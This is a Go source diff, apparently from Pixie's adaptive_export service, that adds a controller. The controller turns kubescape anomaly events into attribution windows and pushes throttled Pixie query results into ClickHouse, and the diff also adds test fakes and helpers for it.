+	// (ADAPTIVE_RECONCILE). nil → reconcile.Nop{} in New (instrument off).
+	Rec reconcile.Recorder
+
+	// Before / After form the time window: t_start = event_time - Before,
+	// t_end = max(t_end, now + After). Both default to 5 min.
+	Before time.Duration
+	After  time.Duration
+
+	// PushPixieTables, when non-empty alongside a non-nil Pixie querier,
+	// makes the controller query pixie for every named table on each
+	// fresh anomaly window and push the result directly to
+	// forensic_db.<table>. Used in environments where the cloud's
+	// retention plugin can't reach the in-cluster CH service.
+	PushPixieTables []string
+
+	// PushRefreshInterval — how often pushPixieRows re-queries pixie
+	// while the attribution window is still active. The first query
+	// covers [t_start, now]; subsequent queries cover only the new
+	// per-table slice [last_upper[table], now] so we don't duplicate
+	// rows. Zero (the natural Go default for unset env vars) is
+	// rewritten to 30s in defaulted(). To DISABLE periodic re-fan-out
+	// (single-shot mode, which loses pixie traffic that arrives after
+	// the kubescape event) set this to a NEGATIVE duration — pick -1
+	// to be unambiguous.
+	PushRefreshInterval time.Duration
+
+	// === Throughput-protection knobs ===
+	//
+	// At high anomaly rates (many concurrent active hashes), the default
+	// pushPixieRows behavior — N parallel PxL queries per hash, no
+	// global cap — can DoS the vizier-query-broker (observed: 90% of
+	// queries DeadlineExceeded at 180s under 4× sweep load). The three
+	// knobs below are independent throttles; all default to 0 (= legacy
+	// unbounded behavior preserved).
+	//
+	// MaxParallelQueriesPerHash caps concurrent goroutines INSIDE one
+	// pushPixieRows pass. 0 = no cap (current). Recommended 3-5 for
+	// load-protective deployments.
+	MaxParallelQueriesPerHash int
+
+	// MaxInflightQueriesGlobal caps concurrent PxL queries across all
+	// pushPixieRows goroutines (every hash). 0 = no cap (current).
+	// Recommended 20-50 — sized to broker capacity.
+	MaxInflightQueriesGlobal int
+
+	// EmptyResultSkipAfterN: after this many consecutive 0-row returns
+	// for the same (pod, table) pair, skip that pair on subsequent
+	// passes for EmptyResultSkipTTL. 0 = disabled (current). A pgsql
+	// pod that never speaks HTTP returns 0 on every http_events
+	// query; skipping eliminates that waste.
+	EmptyResultSkipAfterN int
+
+	// EmptyResultSkipTTL controls how long a (pod, table) stays in the
+	// negative cache. 0 = disabled (current). When the TTL expires the
+	// pair is retried, so a pod that newly starts a protocol
+	// self-heals within at most one TTL.
+	EmptyResultSkipTTL time.Duration
+
+	// OnAttribution, when non-nil, is called for every event after
+	// the attribution row has been computed (whether the row is new
+	// or an extension). The rev-3 streaming path uses this to feed
+	// its ActiveSet without touching controller internals.
+	//
+	// Contract:
+	//   - Called from controller.handle's goroutine.
+	//   - Synchronous; do NOT block. Callbacks that need to do work
+	//     should hand off to a goroutine + buffered channel internally.
+	//   - tEnd is the post-event t_end (= now + After for new rows,
+	//     or the extended value for existing ones).
+	OnAttribution func(namespace, pod string, tEnd time.Time)
+
+	// OnPrune, when non-nil, is called for each hash evicted by
+	// PruneExpired with the (namespace, pod) of the evicted row.
+	// Used by the rev-3 streaming path to shrink its ActiveSet.
+	// Same contract as OnAttribution: synchronous, non-blocking.
+	OnPrune func(namespace, pod string)
+}
+
+func (c *Config) defaulted() Config {
+	cfg := *c // work on a copy; the receiver is left untouched
+	// fill replaces an unset (zero) duration with def and leaves anything else alone.
+	fill := func(d *time.Duration, def time.Duration) {
+		if *d == 0 {
+			*d = def
+		}
+	}
+	fill(&cfg.Before, 5*time.Minute)
+	fill(&cfg.After, 5*time.Minute)
+	// Only zero is rewritten (to 30s). NEGATIVE values pass through untouched
+	// so callers can explicitly request single-shot mode (see the
+	// PushRefreshInterval field doc).
+	fill(&cfg.PushRefreshInterval, 30*time.Second)
+	return cfg
+}
+
+// Controller is the live orchestrator. One instance per operator process.
+type Controller struct {
+	trig    Trigger      // event source consumed by Run
+	sink    Sink         // attribution writer and rehydration source
+	clock   Clock        // time source; RealClock unless New was given another
+	cfg     Config       // copy produced by defaulted() in New; Rec is non-nil there
+	querier PixieQuerier // nil disables operator-side pixie pushes
+
+	mu     sync.Mutex // guards active and inFlight
+	active map[anomaly.AnomalyHash]*sink.AttributionRow
+	// inFlight tracks hashes whose pushPixieRows goroutine is currently
+	// running. handle() re-launches the goroutine when the previous one
+	// has exited (window expired between bursts), so a hash that already
+	// exists in `active` but is no longer being actively fanned-out
+	// gets refreshed protocol-table writes on the next alert. Without
+	// this, the goroutine only spawns on the very first event for a
+	// hash and subsequent bursts silently stop populating per-table
+	// rows even though attribution keeps updating in CH.
+	inFlight map[anomaly.AnomalyHash]bool
+
+	// globalSem is the buffered channel that implements the
+	// MaxInflightQueriesGlobal throttle. nil → no global cap.
+	globalSem chan struct{}
+
+	// emptyCacheMu guards emptyStreak and emptySkipUntil. Both are keyed
+	// by "ns|pod|table" — namespace must be part of the key, otherwise
+	// same-named pods in different namespaces share suppression state.
+	emptyCacheMu   sync.Mutex
+	emptyStreak    map[string]int       // consecutive 0-row returns
+	emptySkipUntil map[string]time.Time // skip this (ns,pod,table) until this time
+}
+
+// New wires a Controller. A nil clk falls back to RealClock and a nil cfg.Rec to
+// reconcile.Nop{}; zero durations in cfg are defaulted. The rev-1 push path stays
+// off until WithPixieQuerier supplies a querier (until then only attribution rows
+// are written and the cloud's retention plugin is expected to write pixie tables).
+func New(trig Trigger, snk Sink, cfg Config, clk Clock) *Controller {
+	eff := cfg.defaulted()
+	if eff.Rec == nil {
+		eff.Rec = reconcile.Nop{}
+	}
+	ctl := &Controller{
+		trig:           trig,
+		sink:           snk,
+		clock:          clk,
+		cfg:            eff,
+		active:         make(map[anomaly.AnomalyHash]*sink.AttributionRow),
+		inFlight:       make(map[anomaly.AnomalyHash]bool),
+		emptyStreak:    make(map[string]int),
+		emptySkipUntil: make(map[string]time.Time),
+	}
+	if clk == nil {
+		ctl.clock = RealClock{}
+	}
+	if limit := eff.MaxInflightQueriesGlobal; limit > 0 {
+		ctl.globalSem = make(chan struct{}, limit)
+	}
+	return ctl
+}
+
+// WithPixieQuerier wires the rev-1 path's querier and returns the receiver for
+// chaining. Idempotent; the field is set without locking, so call before Run.
+func (c *Controller) WithPixieQuerier(q PixieQuerier) *Controller {
+	c.querier = q
+	return c
+}
+
+// Rehydrate reloads this host's still-active attribution rows from the sink into the
+// in-memory active set so a restarted operator picks up where it left off, and re-arms
+// the rev-1 fan-out for them. Idempotent. Call once at boot before Run.
+func (c *Controller) Rehydrate(ctx context.Context) error {
+	rows, err := c.sink.QueryActive(ctx, c.cfg.Hostname)
+	if err != nil {
+		return err
+	}
+	c.mu.Lock()
+	var resume []sink.AttributionRow
+	for i := range rows {
+		row := rows[i] // per-iteration copy, so &row below is a distinct pointer for each hash
+		c.active[row.AnomalyHash] = &row
+		// Rev-1: restoring the window alone starts no pushPixieRows goroutine, so
+		// post-restart Pixie data would be silently missed until another event for
+		// the same hash arrives. Re-arm the fan-out for each restored window,
+		// mirroring handle()'s spawn (in-flight guarded).
+		if c.querier != nil && len(c.cfg.PushPixieTables) > 0 && !c.inFlight[row.AnomalyHash] {
+			c.inFlight[row.AnomalyHash] = true
+			resume = append(resume, row)
+		}
+	}
+	c.mu.Unlock() // goroutines are started only after the lock is released
+	for i := range resume {
+		r := resume[i]
+		go func() { // not awaited. NOTE(review): ctx is reused after return — confirm callers pass a process-lifetime ctx
+			defer func() {
+				c.mu.Lock()
+				delete(c.inFlight, r.AnomalyHash) // clear the marker set above once the fan-out exits
+				c.mu.Unlock()
+			}()
+			c.pushPixieRows(ctx, r)
+		}()
+	}
+	log.WithFields(log.Fields{"rehydrated": len(rows), "resumed": len(resume)}).
+		Info("controller: active set restored")
+	return nil
+}
+
+// Run subscribes to the trigger and feeds every received event to handle
+// until one of two things happens:
+//   - ctx is cancelled: Run returns ctx.Err();
+//   - the trigger closes its channel: Run returns nil.
+//
+// A Subscribe failure is returned as-is before any event is processed.
+func (c *Controller) Run(ctx context.Context) error {
+	events, err := c.trig.Subscribe(ctx)
+	if err != nil {
+		return err
+	}
+	cancelled := ctx.Done()
+	for {
+		select {
+		case ev, open := <-events:
+			if !open {
+				return nil
+			}
+			c.handle(ctx, ev)
+		case <-cancelled:
+			return ctx.Err()
+		}
+	}
+}
+
+// handle processes a single kubescape event.
+//
+// Under c.mu it opens a new attribution row for the event's hash or
+// extends the existing one (t_end only ever grows, last_seen only moves
+// forward, the rule id and anomaly counter are always updated), takes a
+// value snapshot of the row, and decides whether a pushPixieRows
+// goroutine must be started — reserving the in-flight slot in the same
+// critical section so two quick events for one hash cannot both spawn.
+//
+// The snapshot is then persisted through Sink.Write. A write failure is
+// logged and is not fatal: the reserved in-flight slot is released and
+// no fan-out is started, so no pixie rows are written without a
+// persisted attribution row; a later event for the hash tries again.
+// On success OnAttribution (if set) is invoked and, when reserved, the
+// fan-out goroutine is launched so PxL execution never blocks the
+// trigger loop.
+func (c *Controller) handle(ctx context.Context, ev kubescape.Event) {
+	var (
+		hash        = anomaly.Hash(ev.Target)
+		now         = c.clock.Now()
+		eventAt     = eventTimeToTime(ev.EventTime)
+		proposedEnd = now.Add(c.cfg.After)
+	)
+
+	c.mu.Lock()
+	row, known := c.active[hash]
+	if known {
+		// Extend only: a later now+After pushes t_end out, never in.
+		if proposedEnd.After(row.TEnd) {
+			row.TEnd = proposedEnd
+		}
+		// last_seen follows the newest event timestamp seen so far.
+		if eventAt.After(row.LastSeen) {
+			row.LastSeen = eventAt
+		}
+		row.LastRuleID = ev.RuleID
+		row.NAnomalies++
+	} else {
+		row = &sink.AttributionRow{
+			AnomalyHash: hash,
+			Namespace:   ev.Target.Namespace,
+			Pod:         ev.Target.Pod,
+			Comm:        ev.Target.Comm,
+			PID:         ev.Target.PID,
+			Hostname:    c.cfg.Hostname,
+			TStart:      eventAt.Add(-c.cfg.Before),
+			TEnd:        proposedEnd,
+			LastSeen:    eventAt,
+			LastRuleID:  ev.RuleID,
+			NAnomalies:  1,
+		}
+		c.active[hash] = row
+	}
+	snapshot := *row
+	// Decide and reserve in one critical section.
+	spawn := c.querier != nil && len(c.cfg.PushPixieTables) > 0 && !c.inFlight[hash]
+	if spawn {
+		c.inFlight[hash] = true
+	}
+	c.mu.Unlock()
+
+	releaseSlot := func() {
+		c.mu.Lock()
+		delete(c.inFlight, hash)
+		c.mu.Unlock()
+	}
+
+	if err := c.sink.Write(ctx, []sink.AttributionRow{snapshot}); err != nil {
+		log.WithError(err).Warn("controller: sink write failed — skipping fan-out")
+		if spawn {
+			releaseSlot()
+		}
+		return
+	}
+
+	if notify := c.cfg.OnAttribution; notify != nil {
+		notify(snapshot.Namespace, snapshot.Pod, snapshot.TEnd)
+	}
+
+	if !spawn {
+		return
+	}
+	// Covers brand-new hashes as well as hashes whose previous fan-out
+	// goroutine already exited.
+	go func() {
+		defer releaseSlot()
+		c.pushPixieRows(ctx, snapshot)
+	}()
+}
+
+// pushPixieRows fans out per-table PxL queries for one anomaly window and
+// writes the results to ClickHouse through Sink.WritePixieRows (presumably
+// forensic_db.<table>; the original comment was truncated at this point —
+// confirm). One goroutine per anomaly window. The first pass covers
+// [t_start, now]; subsequent passes (every PushRefreshInterval) cover only
+// the new slice [last_upper, now] so pixie traffic that arrives AFTER the
+// initial kubescape event still makes it into CH. The loop exits when the
+// active entry is gone, when the (possibly extended) t_end is in the past,
+// when PushRefreshInterval is negative (single-shot), or when ctx is
+// cancelled. All failures are logged + non-fatal.
+func (c *Controller) pushPixieRows(ctx context.Context, initial sink.AttributionRow) {
+ target := anomaly.Target{
+ PID: initial.PID,
+ Comm: initial.Comm,
+ Pod: initial.Pod,
+ Namespace: initial.Namespace,
+ }
+ log.WithFields(log.Fields{
+ "hash": initial.AnomalyHash,
+ "pod": initial.Pod,
+ "comm": initial.Comm,
+ "tables": len(c.cfg.PushPixieTables),
+ "refresh": c.cfg.PushRefreshInterval,
+ "t_start": initial.TStart,
+ "t_end": initial.TEnd,
+ }).Info("pushPixieRows: starting fan-out")
+
+ // Per-table watermark of pixie data we've already pulled for THIS
+ // hash. We advance a table's cursor only after BOTH the query AND
+ // the sink-write succeed; failures keep the cursor in place so the
+ // next pass retries the same slice instead of dropping it.
+ lastUpper := make(map[string]time.Time, len(c.cfg.PushPixieTables))
+ for _, t := range c.cfg.PushPixieTables {
+ lastUpper[t] = initial.TStart
+ }
+ pass := 0
+ for {
+ if ctx.Err() != nil {
+ return
+ }
+ // Re-snapshot the active row each iteration so we pick up t_end
+ // extensions from concurrent kubescape events (extending the
+ // window beyond the initial t_end). COPY the row out of the
+ // shared pointer before releasing the mutex — handle() mutates
+ // the same struct, so reading TEnd after Unlock would race.
+ c.mu.Lock()
+ live, exists := c.active[initial.AnomalyHash]
+ var current sink.AttributionRow
+ if exists {
+ current = *live
+ }
+ c.mu.Unlock()
+ if !exists {
+ log.WithField("hash", initial.AnomalyHash).
+ Info("pushPixieRows: window closed (active entry gone)")
+ return
+ }
+ now := c.clock.Now()
+ // NOTE(review): when the window expires between two passes, the
+ // slice from the previous pass's upper bound up to t_end is never
+ // queried by this goroutine — confirm whether a final catch-up
+ // pass is wanted.
+ if !current.TEnd.After(now) {
+ log.WithFields(log.Fields{
+ "hash": initial.AnomalyHash,
+ "t_end": current.TEnd,
+ }).Info("pushPixieRows: fan-out complete (window expired)")
+ return
+ }
+
+ pass++
+ // Fan out the per-table PxL queries IN PARALLEL. The serial
+ // rev-1 loop spent 1.5-5s per refresh waiting for the 9 tables
+ // that return 0 rows for this pod (a redis-server pod only ever
+ // has data in redis_events; the other 9 queries are pure
+ // latency tax). Parallel cuts the per-pass wall time to roughly
+ // max(query_time) instead of sum(query_times). Each goroutine
+ // runs an independent Pixie RPC; the cloud's PassThroughProxy
+ // fans them across vizier-query-broker fine in our measurements
+ // (10 simultaneous in-flight queries → ~250-700ms wall vs
+ // ~3-5s serial).
+ type tableResult struct {
+ table string
+ sliceEnd time.Time
+ rows int
+ err error
+ }
+ // Buffered to the table count: every goroutine sends exactly one
+ // result, so no send can block before wg.Wait() returns.
+ results := make(chan tableResult, len(c.cfg.PushPixieTables))
+ var wg sync.WaitGroup
+ // Per-hash concurrency limiter (knob #1: MaxParallelQueriesPerHash).
+ // nil → unbounded (legacy behavior preserved).
+ var perHashSem chan struct{}
+ if c.cfg.MaxParallelQueriesPerHash > 0 {
+ perHashSem = make(chan struct{}, c.cfg.MaxParallelQueriesPerHash)
+ }
+ for _, table := range c.cfg.PushPixieTables {
+ if ctx.Err() != nil {
+ break
+ }
+ // Knob #3: negative-cache skip. Pods that have returned 0
+ // rows for this table N times in a row are skipped for TTL.
+ // Self-heals when TTL expires. A skipped table keeps its
+ // watermark, so the first query after the skip starts at the
+ // old lower bound.
+ if c.shouldSkipEmpty(initial.Namespace, initial.Pod, table) {
+ continue
+ }
+ sliceStart := lastUpper[table]
+ sliceEnd := now
+ if !sliceEnd.After(sliceStart) {
+ continue // tiny / inverted slice — skip
+ }
+ q, err := pxl.QueryFor(table, target, sliceStart, sliceEnd, now)
+ if err != nil {
+ log.WithError(err).WithField("table", table).Warn("controller: QueryFor")
+ continue
+ }
+ wg.Add(1)
+ go func(table, q string, sliceStart, sliceEnd time.Time) {
+ defer wg.Done()
+ // Per-pull reconciliation (ADAPTIVE_RECONCILE): record what
+ // this goroutine READ from Pixie vs WROTE to CH for this
+ // (pod, table, window), on EVERY return path. Deferred so a
+ // sem-cancel / query error / sink error all still emit a row
+ // — the reconcile run needs the failures, not just successes.
+ var readCount, wroteCount int
+ var recErr string
+ defer func() {
+ c.cfg.Rec.Record(ctx, reconcile.Row{
+ TS: now,
+ Mode: "filter",
+ Table: table,
+ Namespace: initial.Namespace,
+ Pod: initial.Pod,
+ WinStart: sliceStart,
+ WinEnd: sliceEnd,
+ ReadCount: int64(readCount),
+ WroteCount: int64(wroteCount),
+ WriteErr: recErr,
+ Hostname: c.cfg.Hostname,
+ })
+ }()
+ // Acquire per-hash slot, then optional global slot.
+ // Order matters: per-hash is cheap and local; global
+ // gates network. Releasing in reverse order avoids the
+ // pathological case where a stuck global slot pins a
+ // per-hash slot for an unrelated table.
+ if perHashSem != nil {
+ select {
+ case perHashSem <- struct{}{}:
+ case <-ctx.Done():
+ recErr = ctx.Err().Error()
+ results <- tableResult{table: table, err: ctx.Err()}
+ return
+ }
+ defer func() { <-perHashSem }()
+ }
+ if c.globalSem != nil {
+ select {
+ case c.globalSem <- struct{}{}:
+ case <-ctx.Done():
+ recErr = ctx.Err().Error()
+ results <- tableResult{table: table, err: ctx.Err()}
+ return
+ }
+ defer func() { <-c.globalSem }()
+ }
+ // Hard-coded 180s budget per PxL query.
+ qctx, cancel := context.WithTimeout(ctx, 180*time.Second)
+ rows, qerr := c.querier.Query(qctx, q)
+ cancel()
+ if qerr != nil {
+ recErr = qerr.Error()
+ results <- tableResult{table: table, err: qerr}
+ return
+ }
+ // Update negative cache: 0 rows bumps streak, ≥1 row resets.
+ c.noteQueryResult(initial.Namespace, initial.Pod, table, len(rows))
+ nrows := len(rows)
+ readCount = nrows
+ if nrows > 0 {
+ // Bound the sink write with its own timeout. Without
+ // this, a stalled CH HTTP write would hold the table
+ // goroutine forever, wg.Wait() would block the entire
+ // pass, and refreshes for the active window would stop
+ // — symptoms documented in our session as "fan-out
+ // started, no error, no push" rows in the operator log.
+ wctx, wcancel := context.WithTimeout(ctx, 60*time.Second)
+ werr := c.sink.WritePixieRows(wctx, table, rows)
+ wcancel()
+ if werr != nil {
+ recErr = werr.Error()
+ results <- tableResult{table: table, err: werr}
+ return
+ }
+ wroteCount = nrows
+ log.WithFields(log.Fields{
+ "table": table,
+ "rows": nrows,
+ "hash": initial.AnomalyHash,
+ "pass": pass,
+ }).Info("pushed pixie rows for active anomaly window")
+ }
+ results <- tableResult{table: table, sliceEnd: sliceEnd, rows: nrows}
+ }(table, q, sliceStart, sliceEnd)
+ }
+ wg.Wait()
+ close(results)
+ for r := range results {
+ if r.err != nil {
+ // Query, sink and ctx-cancel errors all arrive here and are
+ // logged with the same message; they are not distinguished.
+ log.WithError(r.err).WithField("table", r.table).Warn("controller: pixie query or sink")
+ continue // do NOT advance lastUpper — retry next pass
+ }
+ lastUpper[r.table] = r.sliceEnd
+ }
+
+ // Refresh interval treats negative as "single-shot" so callers
+ // can opt out via the dedicated negative sentinel; the default
+ // is 30s, set in defaulted(). Zero is reserved for "use default"
+ // to keep the env-parsing layer simple (env unset → 0 → default).
+ if c.cfg.PushRefreshInterval < 0 {
+ log.WithField("hash", initial.AnomalyHash).
+ Info("pushPixieRows: fan-out complete (single-shot mode)")
+ return
+ }
+ if !sleepOrCancel(ctx, c.cfg.PushRefreshInterval) {
+ return
+ }
+ }
+}
+
+// shouldSkipEmpty tells the caller whether the query for
+// (namespace, pod, table) should be skipped because the triple is still
+// inside its negative-cache window. It always answers false when knob #3
+// is off (EmptyResultSkipAfterN or EmptyResultSkipTTL not positive).
+//
+// When an entry is found but its deadline has passed, both the deadline
+// and the streak counter are dropped, so the next query runs and the
+// cache has to be re-armed from fresh results.
+func (c *Controller) shouldSkipEmpty(namespace, pod, table string) bool {
+	enabled := c.cfg.EmptyResultSkipAfterN > 0 && c.cfg.EmptyResultSkipTTL > 0
+	if !enabled {
+		return false
+	}
+	cacheKey := namespace + "|" + pod + "|" + table
+
+	c.emptyCacheMu.Lock()
+	defer c.emptyCacheMu.Unlock()
+
+	deadline, cached := c.emptySkipUntil[cacheKey]
+	switch {
+	case !cached:
+		return false
+	case c.clock.Now().Before(deadline):
+		return true
+	}
+	// Deadline reached: forget the entry entirely.
+	delete(c.emptySkipUntil, cacheKey)
+	delete(c.emptyStreak, cacheKey)
+	return false
+}
+
+// noteQueryResult feeds the outcome of a successful pixie query into the
+// negative cache for (namespace, pod, table). It is a no-op when knob #3
+// is off.
+//
+// A result with at least one row clears both the streak and any skip
+// deadline. An empty result increments the streak; once the streak is at
+// or above EmptyResultSkipAfterN the skip deadline is (re)set to
+// now + EmptyResultSkipTTL.
+func (c *Controller) noteQueryResult(namespace, pod, table string, nrows int) {
+	if c.cfg.EmptyResultSkipAfterN <= 0 || c.cfg.EmptyResultSkipTTL <= 0 {
+		return
+	}
+
+	c.emptyCacheMu.Lock()
+	defer c.emptyCacheMu.Unlock()
+
+	cacheKey := namespace + "|" + pod + "|" + table
+	if nrows > 0 {
+		delete(c.emptyStreak, cacheKey)
+		delete(c.emptySkipUntil, cacheKey)
+		return
+	}
+
+	streak := c.emptyStreak[cacheKey] + 1
+	c.emptyStreak[cacheKey] = streak
+	if streak < c.cfg.EmptyResultSkipAfterN {
+		return
+	}
+	c.emptySkipUntil[cacheKey] = c.clock.Now().Add(c.cfg.EmptyResultSkipTTL)
+}
+
+// sleepOrCancel blocks for d or until ctx is done, whichever comes first.
+// It reports true when the full duration elapsed and false when ctx ended
+// the wait. The timer is always stopped before returning.
+func sleepOrCancel(ctx context.Context, d time.Duration) bool {
+	timer := time.NewTimer(d)
+	defer timer.Stop()
+
+	slept := false
+	select {
+	case <-timer.C:
+		slept = true
+	case <-ctx.Done():
+	}
+	return slept
+}
+
+// Active reports how many anomaly hashes are currently held in the
+// in-memory active set. The count is read under c.mu. Test helper.
+func (c *Controller) Active() int {
+	c.mu.Lock()
+	count := len(c.active)
+	c.mu.Unlock()
+	return count
+}
+
+// SnapshotActive returns the result of a fresh Sink.QueryActive call for
+// this controller's configured hostname; it does not read or modify the
+// in-memory active set. Exposed so callers (e.g. main.go) can seed the
+// streaming ActiveSet at boot without having to know about Sink
+// internals. Rows and error are passed through from the sink unchanged.
+func (c *Controller) SnapshotActive(ctx context.Context) ([]sink.AttributionRow, error) {
+ return c.sink.QueryActive(ctx, c.cfg.Hostname)
+}
+
+// eventTimeToTime converts forensic_db.kubescape_logs.event_time (UInt64)
+// into a UTC time.Time, picking the unit from the value's magnitude.
+// Vector's kubescape sink in the soc lab writes unix SECONDS (~1.7e9),
+// but other deployments may emit millis (~1.7e12) or nanos (~1.7e18), so
+// a magnitude check keeps one UInt64 column from being silently
+// misread across pipeline variants:
+//
+//	et < 1e10  → seconds
+//	et < 1e13  → milliseconds
+//	otherwise  → nanoseconds
+//
+// The millisecond branch uses time.UnixMilli rather than multiplying into
+// nanoseconds by hand: et*1e6 overflows int64 for et ≥ ~9.223e12, which is
+// still inside the millisecond range.
+func eventTimeToTime(et uint64) time.Time {
+	const (
+		secondsLimit = 1e10 // values below this are unix seconds
+		millisLimit  = 1e13 // values below this are unix milliseconds
+	)
+	switch {
+	case et < secondsLimit:
+		return time.Unix(int64(et), 0).UTC()
+	case et < millisLimit:
+		return time.UnixMilli(int64(et)).UTC()
+	default:
+		return time.Unix(0, int64(et)).UTC()
+	}
+}
+
+// PruneExpired drops from the in-memory active set every hash whose t_end
+// lies at least a grace period (2 * cfg.After) in the past, and returns
+// the number of hashes removed. It only bounds the operator's RAM;
+// table-side cleanup is left to ClickHouse's ReplacingMergeTree.
+//
+// Why a grace period: without it, a same-hash alert arriving just after a
+// prune would start a fresh pushPixieRows goroutine that re-scans from
+// initial.TStart and burns Pixie query budget on data already pulled.
+// Empirically (2026-05-15) the un-graced prune accounted for 100% of
+// pushPixieRows exits; none reached the natural "window expired" path.
+//
+// OnPrune semantics (rev-3 streaming correctness): c.active is keyed by
+// anomaly hash while the streaming layer (ActiveSet) is keyed by
+// (namespace, pod), and one pod can carry several hashes (e.g.
+// pgsql-server has hashes for postgres, pg_isready and runc:[2:INIT]).
+// OnPrune is therefore fired once per pod that lost its LAST hash in this
+// call, never for a pod that still has a surviving hash. Callbacks run
+// after c.mu is released so user code never executes under the lock.
+//
+// Caller invokes on a periodic timer.
+func (c *Controller) PruneExpired() int {
+	type podKey struct{ namespace, pod string }
+
+	now := c.clock.Now()
+	grace := 2 * c.cfg.After
+	evicted := 0
+	orphaned := map[podKey]struct{}{}
+
+	c.mu.Lock()
+	// Step 1: evict expired hashes, remembering the pods they lived on.
+	for hash, row := range c.active {
+		if row.TEnd.Add(grace).After(now) {
+			continue
+		}
+		orphaned[podKey{row.Namespace, row.Pod}] = struct{}{}
+		delete(c.active, hash)
+		evicted++
+	}
+	// Step 2: a pod with any surviving hash is not orphaned after all.
+	for _, row := range c.active {
+		delete(orphaned, podKey{row.Namespace, row.Pod})
+	}
+	c.mu.Unlock()
+
+	if notify := c.cfg.OnPrune; notify != nil {
+		for pk := range orphaned {
+			notify(pk.namespace, pk.pod)
+		}
+	}
+	return evicted
+}
diff --git a/src/vizier/services/adaptive_export/internal/controller/controller_test.go b/src/vizier/services/adaptive_export/internal/controller/controller_test.go
new file mode 100644
index 00000000000..03b5471c070
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/controller/controller_test.go
@@ -0,0 +1,681 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package controller
+
+import (
+ "context"
+ "errors"
+ "sync"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink"
+)
+
+// ---------- fakes ----------
+
+// fakeTrigger is an in-memory trigger for tests: events pushed onto ch are
+// delivered to whoever subscribed, and a non-nil err makes Subscribe fail.
+type fakeTrigger struct {
+	ch  chan kubescape.Event
+	err error
+}
+
+// newFakeTrigger returns a fakeTrigger whose channel buffers 16 events.
+func newFakeTrigger() *fakeTrigger {
+	return &fakeTrigger{ch: make(chan kubescape.Event, 16)}
+}
+
+// Subscribe hands out the internal channel, or the configured error.
+func (f *fakeTrigger) Subscribe(_ context.Context) (<-chan kubescape.Event, error) {
+	if f.err == nil {
+		return f.ch, nil
+	}
+	return nil, f.err
+}
+
+// push enqueues one event for the subscriber.
+func (f *fakeTrigger) push(ev kubescape.Event) {
+	f.ch <- ev
+}
+
+// close closes the event channel, signalling graceful trigger shutdown.
+func (f *fakeTrigger) close() {
+	close(f.ch)
+}
+
+// fakeSink is a mutex-guarded in-memory sink for tests.
+//   - writes collects every attribution row accepted by Write;
+//   - preload is what QueryActive serves (filtered by hostname);
+//   - werr / qerr, when set, make Write / QueryActive fail.
+type fakeSink struct {
+	mu      sync.Mutex
+	writes  []sink.AttributionRow
+	preload []sink.AttributionRow
+	werr    error
+	qerr    error
+}
+
+// WritePixieRows accepts and discards pixie rows.
+func (f *fakeSink) WritePixieRows(_ context.Context, _ string, _ []map[string]any) error {
+	return nil
+}
+
+// Write records rows, or returns werr without recording anything.
+func (f *fakeSink) Write(_ context.Context, rows []sink.AttributionRow) error {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	if err := f.werr; err != nil {
+		return err
+	}
+	f.writes = append(f.writes, rows...)
+	return nil
+}
+
+// QueryActive returns the preloaded rows whose Hostname equals hostname,
+// or qerr when it is set.
+func (f *fakeSink) QueryActive(_ context.Context, hostname string) ([]sink.AttributionRow, error) {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	if err := f.qerr; err != nil {
+		return nil, err
+	}
+	matched := make([]sink.AttributionRow, 0, len(f.preload))
+	for i := range f.preload {
+		if f.preload[i].Hostname != hostname {
+			continue
+		}
+		matched = append(matched, f.preload[i])
+	}
+	return matched, nil
+}
+
+// snapshot returns a copy of the rows written so far.
+func (f *fakeSink) snapshot() []sink.AttributionRow {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	copied := make([]sink.AttributionRow, len(f.writes))
+	copy(copied, f.writes)
+	return copied
+}
+
+// fakeClock is a manually driven clock for tests; reads and updates of t
+// are serialised by mu.
+type fakeClock struct {
+	mu sync.Mutex
+	t  time.Time
+}
+
+// Now returns the clock's current instant.
+func (c *fakeClock) Now() time.Time {
+	c.mu.Lock()
+	current := c.t
+	c.mu.Unlock()
+	return current
+}
+
+// advance moves the clock by d; a negative d rewinds it.
+func (c *fakeClock) advance(d time.Duration) {
+	c.mu.Lock()
+	c.t = c.t.Add(d)
+	c.mu.Unlock()
+}
+
+// ---------- helpers ----------
+
+// canonicalEventTime is the event timestamp shared by the test fixtures.
+var canonicalEventTime = time.Unix(0, 1744477360303026359).UTC()
+
+// canonicalEvent returns the reference event used across the tests: a
+// redis-server process on pod redis-578d5dc9bd-kjj78, rule R1005, stamped
+// with canonicalEventTime in unix nanoseconds.
+func canonicalEvent() kubescape.Event {
+	target := anomaly.Target{
+		PID:       106040,
+		Comm:      "redis-server",
+		Pod:       "redis-578d5dc9bd-kjj78",
+		Namespace: "redis",
+	}
+	return kubescape.Event{
+		Target:    target,
+		EventTime: uint64(canonicalEventTime.UnixNano()),
+		RuleID:    "R1005",
+		Hostname:  "node-1",
+	}
+}
+
+// anotherTargetEvent returns the canonical event re-targeted at a different
+// PID (and rule id).
+func anotherTargetEvent() kubescape.Event {
+	other := canonicalEvent()
+	other.RuleID = "R0006"
+	other.Target.PID = 999999
+	return other
+}
+
+// waitFor polls ok every 2ms until it returns true or deadline has elapsed,
+// and fails the test with "timeout waiting for <what>" in the latter case.
+//
+// ok is always evaluated at least once, and once more after the final
+// sleep, so a condition that becomes true during the last poll interval
+// (or a zero deadline with an already-true condition) is not misreported
+// as a timeout.
+func waitFor(t *testing.T, what string, deadline time.Duration, ok func() bool) {
+	t.Helper()
+	stop := time.Now().Add(deadline)
+	for {
+		if ok() {
+			return
+		}
+		if !time.Now().Before(stop) {
+			break
+		}
+		time.Sleep(2 * time.Millisecond)
+	}
+	t.Fatalf("timeout waiting for %s", what)
+}
+
